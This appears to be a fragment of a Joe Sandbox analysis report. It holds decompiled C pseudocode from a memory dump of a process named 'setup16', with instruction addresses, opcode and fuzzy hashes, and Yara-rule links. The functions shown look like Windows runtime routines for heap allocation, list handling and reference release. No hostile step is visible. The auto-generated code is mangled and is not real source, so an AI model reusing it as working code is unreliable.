				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E049FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E049FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L049E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                                                                                                                        0x049d7672
                                                                                                                                                                                                        0x049d767f
                                                                                                                                                                                                        0x049d7689
                                                                                                                                                                                                        0x049d76de
                                                                                                                                                                                                        0x049d76de
                                                                                                                                                                                                        0x049d768b
                                                                                                                                                                                                        0x049d7691
                                                                                                                                                                                                        0x049d7693
                                                                                                                                                                                                        0x049d7697
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d7699
                                                                                                                                                                                                        0x049d76a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d76aa
                                                                                                                                                                                                        0x049d76ad
                                                                                                                                                                                                        0x049d76b1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d76b3
                                                                                                                                                                                                        0x049d76b3
                                                                                                                                                                                                        0x049d76b5
                                                                                                                                                                                                        0x049d76ba
                                                                                                                                                                                                        0x049d76bc
                                                                                                                                                                                                        0x049d76bc
                                                                                                                                                                                                        0x049d76c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d76c2
                                                                                                                                                                                                        0x049d76ce
                                                                                                                                                                                                        0x049d76ce
                                                                                                                                                                                                        0x049d76c0
                                                                                                                                                                                                        0x049d76b1
                                                                                                                                                                                                        0x049d76a8
                                                                                                                                                                                                        0x049d7697
                                                                                                                                                                                                        0x049d76d9

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                                                                                        • Instruction ID: 204c4a00438e736da0f98dba26aee09fad86616e7c5add59fe3718a9b9d86d38
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED01843270011DAFD720AE9ECC41E5B77ADFB84BA0B644579B908CB254EA70ED0187A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C9080 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                                        			E049C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4ab85ec;
				E049E2280(_t48, 0x4ab85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E049DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4ab538c; // 0xa7d608
					if( *_t84 != 0x4ab5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4a9f6e8);
						E04A1D0E8(0x4ab85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04A988F5(_t80, _t85, 0x4ab5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4ab86c0; // 0xa707b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4ab86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E049E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04A988F5(0x4ab85ec, _t85, 0x4ab5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04A0AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4abb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4ab84c0;
																			if(_t82 >=  *0x4ab84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04A99063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E049C922A(_t99);
										_t64 = E049E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04A98B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4ab86c0; // 0xa707b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4ab86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4ab86bc;
													_t87 = 0x4ab86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E049C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4ab86c4;
												_t87 = 0x4ab86c0;
												L27:
												E049F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04A1D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4ab5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4ab538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                                                                                                                        0x049c9082
                                                                                                                                                                                                        0x049c9083
                                                                                                                                                                                                        0x049c9084
                                                                                                                                                                                                        0x049c9085
                                                                                                                                                                                                        0x049c9087
                                                                                                                                                                                                        0x049c9096
                                                                                                                                                                                                        0x049c9098
                                                                                                                                                                                                        0x049c9098
                                                                                                                                                                                                        0x049c909e
                                                                                                                                                                                                        0x049c90a8
                                                                                                                                                                                                        0x049c90e7
                                                                                                                                                                                                        0x049c90e7
                                                                                                                                                                                                        0x049c90aa
                                                                                                                                                                                                        0x049c90b0
                                                                                                                                                                                                        0x049c90b7
                                                                                                                                                                                                        0x049c90bd
                                                                                                                                                                                                        0x049c90dd
                                                                                                                                                                                                        0x049c90e6
                                                                                                                                                                                                        0x049c90bf
                                                                                                                                                                                                        0x049c90bf
                                                                                                                                                                                                        0x049c90c7
                                                                                                                                                                                                        0x049c90cf
                                                                                                                                                                                                        0x049c90f1
                                                                                                                                                                                                        0x049c90f2
                                                                                                                                                                                                        0x049c90f4
                                                                                                                                                                                                        0x049c90f5
                                                                                                                                                                                                        0x049c90f6
                                                                                                                                                                                                        0x049c90f7
                                                                                                                                                                                                        0x049c90f8
                                                                                                                                                                                                        0x049c90f9
                                                                                                                                                                                                        0x049c90fa
                                                                                                                                                                                                        0x049c90fb
                                                                                                                                                                                                        0x049c90fc
                                                                                                                                                                                                        0x049c90fd
                                                                                                                                                                                                        0x049c90fe
                                                                                                                                                                                                        0x049c90ff
                                                                                                                                                                                                        0x049c9100
                                                                                                                                                                                                        0x049c9102
                                                                                                                                                                                                        0x049c9107
                                                                                                                                                                                                        0x049c910c
                                                                                                                                                                                                        0x049c9110
                                                                                                                                                                                                        0x049c9113
                                                                                                                                                                                                        0x049c9115
                                                                                                                                                                                                        0x049c9136
                                                                                                                                                                                                        0x049c913f
                                                                                                                                                                                                        0x049c9143
                                                                                                                                                                                                        0x04a237e4
                                                                                                                                                                                                        0x04a237e4
                                                                                                                                                                                                        0x049c9117
                                                                                                                                                                                                        0x049c9117
                                                                                                                                                                                                        0x049c911d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c911f
                                                                                                                                                                                                        0x049c911f
                                                                                                                                                                                                        0x049c9125
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9127
                                                                                                                                                                                                        0x049c912d
                                                                                                                                                                                                        0x049c9130
                                                                                                                                                                                                        0x049c9134
                                                                                                                                                                                                        0x049c9158
                                                                                                                                                                                                        0x049c915d
                                                                                                                                                                                                        0x049c9161
                                                                                                                                                                                                        0x049c9168
                                                                                                                                                                                                        0x04a23715
                                                                                                                                                                                                        0x049c916e
                                                                                                                                                                                                        0x049c916e
                                                                                                                                                                                                        0x049c9175
                                                                                                                                                                                                        0x049c9177
                                                                                                                                                                                                        0x049c917e
                                                                                                                                                                                                        0x049c917f
                                                                                                                                                                                                        0x049c9182
                                                                                                                                                                                                        0x049c9182
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c918a
                                                                                                                                                                                                        0x049c918d
                                                                                                                                                                                                        0x049c918f
                                                                                                                                                                                                        0x049c9192
                                                                                                                                                                                                        0x049c9195
                                                                                                                                                                                                        0x049c9198
                                                                                                                                                                                                        0x049c9198
                                                                                                                                                                                                        0x049c9198
                                                                                                                                                                                                        0x049c919a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2371f
                                                                                                                                                                                                        0x04a23721
                                                                                                                                                                                                        0x04a23727
                                                                                                                                                                                                        0x04a2372f
                                                                                                                                                                                                        0x04a23733
                                                                                                                                                                                                        0x04a23735
                                                                                                                                                                                                        0x04a23738
                                                                                                                                                                                                        0x04a2373b
                                                                                                                                                                                                        0x04a2373d
                                                                                                                                                                                                        0x04a23740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23746
                                                                                                                                                                                                        0x04a23746
                                                                                                                                                                                                        0x04a23749
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2374f
                                                                                                                                                                                                        0x04a2374f
                                                                                                                                                                                                        0x04a23751
                                                                                                                                                                                                        0x04a23757
                                                                                                                                                                                                        0x04a23759
                                                                                                                                                                                                        0x04a2375c
                                                                                                                                                                                                        0x04a2375c
                                                                                                                                                                                                        0x04a2375e
                                                                                                                                                                                                        0x04a2375e
                                                                                                                                                                                                        0x04a23761
                                                                                                                                                                                                        0x04a23764
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23766
                                                                                                                                                                                                        0x04a23768
                                                                                                                                                                                                        0x04a237a3
                                                                                                                                                                                                        0x04a237a3
                                                                                                                                                                                                        0x04a237a5
                                                                                                                                                                                                        0x04a237a7
                                                                                                                                                                                                        0x04a237ad
                                                                                                                                                                                                        0x04a237b0
                                                                                                                                                                                                        0x04a237b2
                                                                                                                                                                                                        0x04a237bc
                                                                                                                                                                                                        0x04a237c2
                                                                                                                                                                                                        0x04a237c2
                                                                                                                                                                                                        0x04a237b2
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c918a
                                                                                                                                                                                                        0x049c918d
                                                                                                                                                                                                        0x049c918f
                                                                                                                                                                                                        0x049c9192
                                                                                                                                                                                                        0x049c9195
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9195
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2376a
                                                                                                                                                                                                        0x04a2376a
                                                                                                                                                                                                        0x04a2376a
                                                                                                                                                                                                        0x04a2376c
                                                                                                                                                                                                        0x04a2376c
                                                                                                                                                                                                        0x04a2376f
                                                                                                                                                                                                        0x04a23775
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23777
                                                                                                                                                                                                        0x04a23779
                                                                                                                                                                                                        0x04a23782
                                                                                                                                                                                                        0x04a23787
                                                                                                                                                                                                        0x04a23789
                                                                                                                                                                                                        0x04a23790
                                                                                                                                                                                                        0x04a23790
                                                                                                                                                                                                        0x04a2378b
                                                                                                                                                                                                        0x04a2378b
                                                                                                                                                                                                        0x04a2378b
                                                                                                                                                                                                        0x04a23792
                                                                                                                                                                                                        0x04a23795
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23795
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23779
                                                                                                                                                                                                        0x04a23798
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23798
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23768
                                                                                                                                                                                                        0x04a2379b
                                                                                                                                                                                                        0x04a2379b
                                                                                                                                                                                                        0x04a23751
                                                                                                                                                                                                        0x04a23749
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23740
                                                                                                                                                                                                        0x049c91a0
                                                                                                                                                                                                        0x049c91a3
                                                                                                                                                                                                        0x049c91a9
                                                                                                                                                                                                        0x049c91b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c91b0
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c91b4
                                                                                                                                                                                                        0x049c91b4
                                                                                                                                                                                                        0x049c91bb
                                                                                                                                                                                                        0x049c91c0
                                                                                                                                                                                                        0x049c91c5
                                                                                                                                                                                                        0x049c91c7
                                                                                                                                                                                                        0x04a237da
                                                                                                                                                                                                        0x049c91cd
                                                                                                                                                                                                        0x049c91cd
                                                                                                                                                                                                        0x049c91cd
                                                                                                                                                                                                        0x049c91d2
                                                                                                                                                                                                        0x049c91d5
                                                                                                                                                                                                        0x049c9239
                                                                                                                                                                                                        0x049c9239
                                                                                                                                                                                                        0x049c91d7
                                                                                                                                                                                                        0x049c91db
                                                                                                                                                                                                        0x049c91e1
                                                                                                                                                                                                        0x049c91e7
                                                                                                                                                                                                        0x049c91fd
                                                                                                                                                                                                        0x049c9203
                                                                                                                                                                                                        0x049c921e
                                                                                                                                                                                                        0x049c9223
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9205
                                                                                                                                                                                                        0x049c9205
                                                                                                                                                                                                        0x049c9208
                                                                                                                                                                                                        0x049c920c
                                                                                                                                                                                                        0x049c9214
                                                                                                                                                                                                        0x049c9214
                                                                                                                                                                                                        0x049c920c
                                                                                                                                                                                                        0x049c91e9
                                                                                                                                                                                                        0x049c91e9
                                                                                                                                                                                                        0x049c91ee
                                                                                                                                                                                                        0x049c91f3
                                                                                                                                                                                                        0x049c91f3
                                                                                                                                                                                                        0x049c91f3
                                                                                                                                                                                                        0x049c91e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9134
                                                                                                                                                                                                        0x049c9125
                                                                                                                                                                                                        0x049c911d
                                                                                                                                                                                                        0x049c914e
                                                                                                                                                                                                        0x049c90d1
                                                                                                                                                                                                        0x049c90d1
                                                                                                                                                                                                        0x049c90d3
                                                                                                                                                                                                        0x049c90d6
                                                                                                                                                                                                        0x049c90d8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c90d8
                                                                                                                                                                                                        0x049c90cf

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 10504d528b9679b650bf22d28a7d4790931ea48921b535eb462e1568235b97fc
                                                                                                                                                                                                        • Instruction ID: 5d80d77503b5b845a4019428136e5fc4c167a2d905edc1b79cc58951aba1c238
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10504d528b9679b650bf22d28a7d4790931ea48921b535eb462e1568235b97fc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F401F4B2A012009FE3199F08D840B217BADEB85329F25407AE1019B792C374FC41CBD1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A5C450 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 46%
                                                                                                                                                                                                        			E04A5C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04A09910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04A095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04A095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04A095D0();
				return L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                                                                                                                        0x04a5c458
                                                                                                                                                                                                        0x04a5c45d
                                                                                                                                                                                                        0x04a5c466
                                                                                                                                                                                                        0x04a5c468
                                                                                                                                                                                                        0x04a5c469
                                                                                                                                                                                                        0x04a5c46a
                                                                                                                                                                                                        0x04a5c46b
                                                                                                                                                                                                        0x04a5c46e
                                                                                                                                                                                                        0x04a5c46f
                                                                                                                                                                                                        0x04a5c471
                                                                                                                                                                                                        0x04a5c476
                                                                                                                                                                                                        0x04a5c476
                                                                                                                                                                                                        0x04a5c47c
                                                                                                                                                                                                        0x04a5c47e
                                                                                                                                                                                                        0x04a5c480
                                                                                                                                                                                                        0x04a5c480
                                                                                                                                                                                                        0x04a5c483
                                                                                                                                                                                                        0x04a5c484
                                                                                                                                                                                                        0x04a5c486
                                                                                                                                                                                                        0x04a5c488
                                                                                                                                                                                                        0x04a5c48f
                                                                                                                                                                                                        0x04a5c491
                                                                                                                                                                                                        0x04a5c493
                                                                                                                                                                                                        0x04a5c493
                                                                                                                                                                                                        0x04a5c48f
                                                                                                                                                                                                        0x04a5c498
                                                                                                                                                                                                        0x04a5c49e
                                                                                                                                                                                                        0x04a5c4ad
                                                                                                                                                                                                        0x04a5c4ad
                                                                                                                                                                                                        0x04a5c4b2
                                                                                                                                                                                                        0x04a5c4b4
                                                                                                                                                                                                        0x04a5c4cd

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                                                                                                        • Instruction ID: 95e8604434e0333556bbb683726c8696ddcad59a05de74f5bf4fd3a59a87a85c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 880180B2140605BFE625AF66DD84E63BB7DFB943A4F008525F514425B4CB32FCA1CAA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A94015 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E04A94015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E049E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E049E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4ab86ac);
					E049CF900(0x4ab86d4, _t28);
					E049DFFB0(0x4ab86ac, _t28, 0x4ab86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E049DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                                                                                                                        0x04a9401a
                                                                                                                                                                                                        0x04a9401e
                                                                                                                                                                                                        0x04a94023
                                                                                                                                                                                                        0x04a94028
                                                                                                                                                                                                        0x04a94029
                                                                                                                                                                                                        0x04a9402b
                                                                                                                                                                                                        0x04a9402f
                                                                                                                                                                                                        0x04a94043
                                                                                                                                                                                                        0x04a94046
                                                                                                                                                                                                        0x04a94051
                                                                                                                                                                                                        0x04a94057
                                                                                                                                                                                                        0x04a9405f
                                                                                                                                                                                                        0x04a94062
                                                                                                                                                                                                        0x04a94067
                                                                                                                                                                                                        0x04a9406f
                                                                                                                                                                                                        0x04a9407c
                                                                                                                                                                                                        0x04a9407c
                                                                                                                                                                                                        0x04a9408c
                                                                                                                                                                                                        0x04a9408c
                                                                                                                                                                                                        0x04a94097

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0d60cacc881e43db0b3532ec90e997c5c4ac79d8e42dfab608f9d5d57f3bfd71
                                                                                                                                                                                                        • Instruction ID: 471c86fce5692e2fb925d47d23da6f6c0e85bb72b038e23d825b42229eeda277
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d60cacc881e43db0b3532ec90e997c5c4ac79d8e42dfab608f9d5d57f3bfd71
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 580184722415457FE615AB69CD80E63B7ACFB89758B000679B50887A12DB24FC11C6E4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A814FB Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                                        			E04A814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4abd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04A0FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E049E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                                                                                        0x04a814fb
                                                                                                                                                                                                        0x04a814fb
                                                                                                                                                                                                        0x04a8150a
                                                                                                                                                                                                        0x04a81514
                                                                                                                                                                                                        0x04a81519
                                                                                                                                                                                                        0x04a8151b
                                                                                                                                                                                                        0x04a81526
                                                                                                                                                                                                        0x04a8152c
                                                                                                                                                                                                        0x04a81534
                                                                                                                                                                                                        0x04a81537
                                                                                                                                                                                                        0x04a8153a
                                                                                                                                                                                                        0x04a81545
                                                                                                                                                                                                        0x04a81557
                                                                                                                                                                                                        0x04a81547
                                                                                                                                                                                                        0x04a81550
                                                                                                                                                                                                        0x04a81550
                                                                                                                                                                                                        0x04a81562
                                                                                                                                                                                                        0x04a81563
                                                                                                                                                                                                        0x04a81565
